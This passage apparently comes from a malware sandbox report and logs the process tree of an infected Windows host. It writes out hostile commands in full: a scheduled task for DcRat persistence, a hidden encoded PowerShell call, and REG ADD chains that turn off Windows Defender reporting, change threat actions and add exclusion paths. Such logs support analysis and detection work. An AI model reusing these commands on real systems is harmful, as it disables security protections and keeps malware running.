                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 78296 -s 1784
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:84780
                                                                                                                                                      • C:\Users\Admin\AppData\Local\70c042d1-46ba-4931-a96c-cd53a1fad360\build3.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\70c042d1-46ba-4931-a96c-cd53a1fad360\build3.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:78084
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:78116
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1188 -ip 1188
                                                                                                                                                1⤵
                                                                                                                                                  PID:74208
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D351.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D351.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:79656
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:77124
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1188 -ip 1188
                                                                                                                                                  1⤵
                                                                                                                                                    PID:80648
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1380 -ip 1380
                                                                                                                                                    1⤵
                                                                                                                                                      PID:79612
                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Accesses Microsoft Outlook profiles
                                                                                                                                                      PID:85860
                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                                                                                                                      1⤵
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      PID:85896
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:85928
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 85928 -s 600
                                                                                                                                                          3⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:91044
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:85964
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 85928 -ip 85928
                                                                                                                                                        1⤵
                                                                                                                                                          PID:87756
                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          1⤵
                                                                                                                                                            PID:93124
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1188 -ip 1188
                                                                                                                                                            1⤵
                                                                                                                                                              PID:104872
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                              1⤵
                                                                                                                                                                PID:122276
                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:81736
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1188 -ip 1188
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1916
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1188 -ip 1188
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:17076
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1188 -ip 1188
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:34336
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1380 -ip 1380
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:77648
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1188 -ip 1188
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:77668
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\tjarhut
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\tjarhut
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                            PID:77788
                                                                                                                                                                          • C:\Users\Admin\Programs\Adblock\DnsService.exe
                                                                                                                                                                            C:\Users\Admin\Programs\Adblock\DnsService.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:77988
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1188 -ip 1188
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:79000
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 78880 -ip 78880
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:79124
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\55EB.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\55EB.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                PID:79548
                                                                                                                                                                                • C:\Windows\SysWOW64\agentactivationruntimestarter.exe
                                                                                                                                                                                  C:\Windows\system32\agentactivationruntimestarter.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:79680
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                    PID:83548
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 79548 -s 428
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:83608
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 79548 -s 1004
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:84388
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 79548 -s 1004
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:84484
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    PID:84560
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 79548 -s 1084
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:84584
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 79548 -s 676
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:84788
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\eoLFqTN.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\eoLFqTN.exe d8 /site_id 525403 /S
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  PID:79564
                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:79696
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:80028
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:80072
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:80196
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:80216
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:80236
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:80276
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:80328
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:80348
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:80368
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:80388
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:80408
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:80432
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:80464
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:80492
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:80512
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:80536
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:80564
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:80580
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:80596
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:80616
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:80668
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:80680
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:80712
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:80776
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:80888
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCMDmHxGrLJHC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCMDmHxGrLJHC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnSvEXTIbraTatzTOsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnSvEXTIbraTatzTOsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jIUrjTqJU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jIUrjTqJU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVCmSimpmwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVCmSimpmwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\twylNxKJekDU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\twylNxKJekDU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CEEEIGvNcEpIBnVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CEEEIGvNcEpIBnVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fwhiGQHhSfnZUzkc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fwhiGQHhSfnZUzkc\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      PID:80940
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:81092
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:81108
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:81128
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:81160
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:81176
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:32
